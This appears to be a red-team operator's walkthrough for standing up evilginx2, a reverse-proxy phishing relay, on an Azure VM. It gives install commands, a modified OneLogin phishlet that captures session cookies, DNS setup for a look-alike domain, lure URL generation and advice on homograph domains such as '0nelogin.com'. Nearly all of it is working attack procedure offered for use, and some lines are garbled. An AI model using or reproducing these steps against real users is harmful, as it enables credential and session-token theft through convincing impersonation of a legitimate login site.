this is a relay framework that acts as a web proxy and can be used by red teams to phish credentials. this tool sits in the middle of the traffic and has a back-end connection to the legitimate website which it uses to forward data from the victim. this nginx vps subdomain MUST exactly match the legitimate subdomain to be spoofed.
#create the ec2/azure instance
root@oco:~$ BROWSER > https://portal.azure.com > Virtual Machines
Project Details
Subscription: {subscription}
Resource Group: {resourceGroup}
Instance Details
Virtual Machine Name: {evilginx}
Region: US
Availability Options: No Infrastructure Redundancy Required
Security Type: Standard
Image: Ubuntu Server 20.04 LTS - x64 Gen2
VM Architecture: x64
Run w/ Azure Spot Discount: Disabled
Size: Standard D2as_v4 - 2 vcpus 8GiB memory ($$$)
Administrator Account
Authentication Type: SSH public Key
Username: {evilginxUser}
SSH Public Key Source: Generate new key pair
Key pair name: {arbitraryValue}
Inbound Port Rules
Public Inbound ports: None //this disabled public access to instance
Select Inbound Ports: N/A
Disks
Encryption at host: Disabled
OS Disk
OS Disk Type: Premium SSD (locally-redundant storage - LRS)
Delete w/ VM: Enabled
Key Management: Platform-managed key
Enable Ultra Fisk Compatibility: Disabled
Data Disks for {evilginx}: Create and attach a new disk
Name: {evilginx}_DataDisk_0
Source Type: None (Empty Disk)
Size: 16 GiB
Key management: Platform-managed key
Enable shared disk: No
Delete disk w/ VM: Enabled
Management
Network Interface
Virtual Network: {...LabVNet}
Subnet: default (.../24)
Public IP: {...}
NIC Network Security Group: Basic
Public Inbound Ports: None
Select Inbound Ports: N/A
Delete NIC when VM is deleted: Disabled
Enable Accelerated Networking: Enabled
Load Balancing
Place VM Behind Existing LB Solution: Disabled
* Create the VM after review
#create a DNS A record pointing it to the vps instance ip to {subdomain}.{domain}.{tld}
#this is required prior to proceeding
#connect to the ec2 virtual machine
root@evilginx:~$ sudo -i {key}.pem [email protected]#install golang
root@evilginx:~$ go version
root@evilginx:~$ sudo apt update
root@evilginx:~$ sudo apt update && sudo apt upgrade -y
root@evilginx:~$ wget https://dl.google.com/go/go1.11.linux-amd64.tar.gz
* ALT: sudo apt install golang -y
root@evilginx:~$ sudo tar -xvf go1.11-linux-amd64.tar.gz
root@evilginx:~$ sudo mv go /usr/local
root@evilginx:~$ sudo cp /usr/local/go/bin/go /usr/bin
root@evilginx:~$ nano .profile
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go:$GOPATH/bin
root@evilginx:~$ source .profile //reflect changes
#install evilginx
root@evilginx:~$ go get -u github.com/kgretzky/evilginx2
root@evilginx:~$ ls
go
root@evilginx:~$ cd go
root@evilginx:~$ ls
bin src
root@evilginx:~$ ls go/bin
evilginx2
root@evilginx:~$ ls src/github.com/kgretzky/evilginx2/
...phishlets templates database
root@evilginx:~$ cd src/github.com/kgretzky/evilginx2/
root@evilginx:~$ ls phishlets
...onelogin.yaml amazon.yaml
root@evilginx:~$ cd src/github.com/kgretzky/evilginx2/phishlets
#disable unnecessary statements
root@evilginx:~$ nano onelogin.yaml
proxy_hosts:
#-{phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false}
#-{phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com' session: false, is_landing: false}
* comment statements that are not required in CUOPS
#modify configuration for operations
root@evilginx:~$ nano onelogin.yaml
proxy_hosts:
- {phish_sub: 'cwlab', orig_sub: 'cwlab', domain: 'onelogin.com', session: true, is_landing: true}
auth_tokens:
- domain: '.onelogin.com'
keys: ['onelogin.com_user']
- domain: 'cwlab.onelogin.com'
keys: ['sub_session_onelogin.com']
login:
domain: 'cwlab.onelogin.com'
path: '/login'
#phishlets format; note that the phish subdomain MUST match the legitimate subdomain!
* legitimate subdomain: {cwlab}.onelogin.com
* phishing subdomain: {cwlab}.cyberwarfare.live
#perform a test to see the flow of how a potential target will login to the legitimate site
root@oco: BROWSER > {cwlab}.onelogin.com
redirect: https://cwlab.onelogin.com/login2/?retrn=eyJ0...
* this is done IOT see the parameters needed to fully configure evilginx to the operation
#reconfigure the evilginx server hostname to match the target webserver as close as possible - use homographs
root@evilginx:~$ hostname
evilginx
root@evilginx:~$ sudo nano /etc/hostname
cyberwarfare.live
root@evilginx:~$ hostnamectl status
Static Hostname: cyberwarfare.live
root@evilginx:~$ sudo reboot
root@cyberwarfare:~$ hostname
cyberwarfare.live
root@cyberwarfare:~$ cd $GOPATH/bin
root@cyberwarfare:~$ ls
evilginx2
#start evilginx2
root@cyberwarfare:~$ sudo ./evilginx2 -p /home/azureuser/go/src/github.com/kgretzky/evilginx2/phishlets/
* the -p specifies the phishlets directory
#configure the domain
evilginx: config domain cyberwarfare.live
evilginx: config ip {evilginx IP from cloud instance}
* {4.193.141.23}
#create a DNS A record pointing {cyberwarfare.live} to the vps instance ip
#use own squarespace domain account
root@oco:~$ BROWSER > https://squarespace.com
Name: cwlab.cyberwarfare.live
IP: {4.193.141.23}
Type: A Record
root@oco:~$ nslookup cwlab.cyberwarfare.live
* must resolve to {4.193.141.23}
evilginx: phishlets hostname onelogin {cyberwarfare.live}
evilginx: phishlets enable onelogin
* this cmd will automatically register & setup the TLS/SSL certificate for the domain cyberwarfare.live
evilginx: lures create onelogin
evilginx: lures edit 0 redirect_url https://cyberwarfare.live
evilginx: get-url 0
https://cwlab.cyberwarfare.live/hmHyBQkP
* this will be the look-alike phishing URL for cwlab.onelogin.com
- the evilginx domain {cyberwarfare.live} must MATCH the legitimate site as close as possible
- e.g., using homoraphs etc
- legit site: onelogin.com
- homograph: 0nelogin.com
* sessions
- this cmd wasn't shown
